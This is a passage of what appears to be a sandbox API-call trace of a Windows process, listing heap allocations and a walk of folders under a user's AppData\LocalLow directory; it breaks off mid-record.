[0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b424b0 | out: hHeap=0xcd0000) returned 1 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0172.749] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0172.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0172.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0172.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.753] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.753] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.753] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.753] PathFindFileNameW (pszPath="") returned="" [0172.753] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ef20 | out: hHeap=0xcd0000) returned 1 [0172.754] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.754] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0172.754] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0172.754] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.754] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0172.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0172.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.769] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.769] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.769] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0172.769] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.769] PathFindFileNameW (pszPath="") returned="" [0172.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cdc0 | out: hHeap=0xcd0000) returned 1 [0172.770] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.770] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0172.770] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.770] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.771] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0172.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.771] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.771] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.771] PathFindFileNameW (pszPath="") returned="" [0172.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45e88 | out: hHeap=0xcd0000) returned 1 [0172.771] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 